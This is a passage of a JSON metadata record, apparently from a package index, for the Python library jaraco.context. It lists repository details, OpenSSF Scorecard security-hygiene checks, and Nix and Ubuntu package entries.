{"id":371746,"url":"https://github.com/jaraco/jaraco.context","last_synced_at":"2026-08-25T14:08:32.247Z","repository":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":7,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-08-14T10:54:24.131Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":null,"gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2026-08-06T04:43:36.220Z","dependency_job_id":null,"html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36801458,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"owner":{"login":"jaraco","name":"Jason R. Coombs","uuid":"308610","kind":"user","description":"","email":"jaraco@jaraco.com","website":"https://www.jaraco.com","location":"Pittsburgh, PA, USA","twitter":"jaraco","company":null,"icon_url":"https://avatars.githubusercontent.com/u/308610?u=5b3fdef94d1b0ac7392d17643eaba029f5f13bea\u0026v=4","repositories_count":234,"last_synced_at":"2026-08-22T00:11:51.471Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/jaraco","funding_links":["https://github.com/sponsors/jaraco"],"total_stars":5443,"followers":749,"following":5,"created_at":"2022-11-02T16:21:31.721Z","updated_at":"2026-08-22T00:11:51.517Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco/repositories"},"packages":[{"id":13195722,"name":"python311Packages.jaraco-context","ecosystem":"nixpkgs","description":"Python module for context management","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-02T00:24:30.051Z","latest_release_published_at":"2026-02-02T00:24:30.051Z","latest_release_number":"4.3.0","last_synced_at":"2026-08-22T00:31:20.078Z","created_at":"2026-02-02T00:23:03.204Z","updated_at":"2026-08-22T00:31:20.079Z","registry_url":"https://search.nixos.org/packages?channel=24.05\u0026query=python311Packages.jaraco-context","install_command":"nix-env -iA nixpkgs.python311Packages.jaraco-context","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.05/pkgs/development/python-modules/jaraco-context/default.nix#L33","metadata":{"nix_attribute":"python3.11-jaraco-context-4.3.0","position":"pkgs/development/python-modules/jaraco-context/default.nix:33","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","i686-cygwin","x86_64-cygwin","x86_64-windows","i686-windows"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"jaraco-context","upstream_purl":"pkg:pypi/jaraco-context"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.136Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python311Packages.jaraco-context?channel=24.05\u0026repository_url=https://channels.nixos.org/nixos-24.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python311Packages.jaraco-context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python311Packages.jaraco-context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python311Packages.jaraco-context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python311Packages.jaraco-context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python311Packages.jaraco-context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python311Packages.jaraco-context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python311Packages.jaraco-context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python311Packages.jaraco-context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python311Packages.jaraco-context/codemeta","maintainers":[{"uuid":"fabaff","login":null,"name":"Fabian Affolter","email":"mail@fabian-affolter.ch","url":"https://github.com/fabaff","packages_count":4856,"html_url":null,"role":null,"created_at":"2026-03-07T06:05:57.811Z","updated_at":"2026-03-07T06:05:57.811Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers/fabaff/packages"}],"registry":{"name":"nixpkgs-24.05","url":"https://channels.nixos.org/nixos-24.05","ecosystem":"nixpkgs","default":false,"packages_count":116156,"maintainers_count":3383,"namespaces_count":0,"keywords_count":654,"github":"NixOS","metadata":{"funded_packages_count":3165},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.309Z","updated_at":"2026-08-24T05:01:24.965Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/namespaces"}},{"id":13534105,"name":"jaraco.context","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/jaraco/jaraco.context","licenses":null,"normalized_licenses":[],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":["misc"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-11T00:09:53.083Z","latest_release_published_at":"2026-02-11T00:09:53.083Z","latest_release_number":"4.2.0-1","last_synced_at":"2026-08-22T00:31:49.374Z","created_at":"2026-02-11T00:09:52.886Z","updated_at":"2026-08-22T00:31:49.375Z","registry_url":"https://launchpad.net/ubuntu/+source/jaraco.context","install_command":"apt-get install jaraco.context","documentation_url":null,"metadata":{"component":"main","architecture":"all","priority":"optional","binary":"python3-jaraco.context","standards_version":"4.6.1","maintainer":"Jeroen Ploemen \u003cjcfp@debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-python, pybuild-plugin-pyproject, python3-all, python3-pytest \u003c!nocheck\u003e, python3-setuptools, python3-setuptools-scm","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and 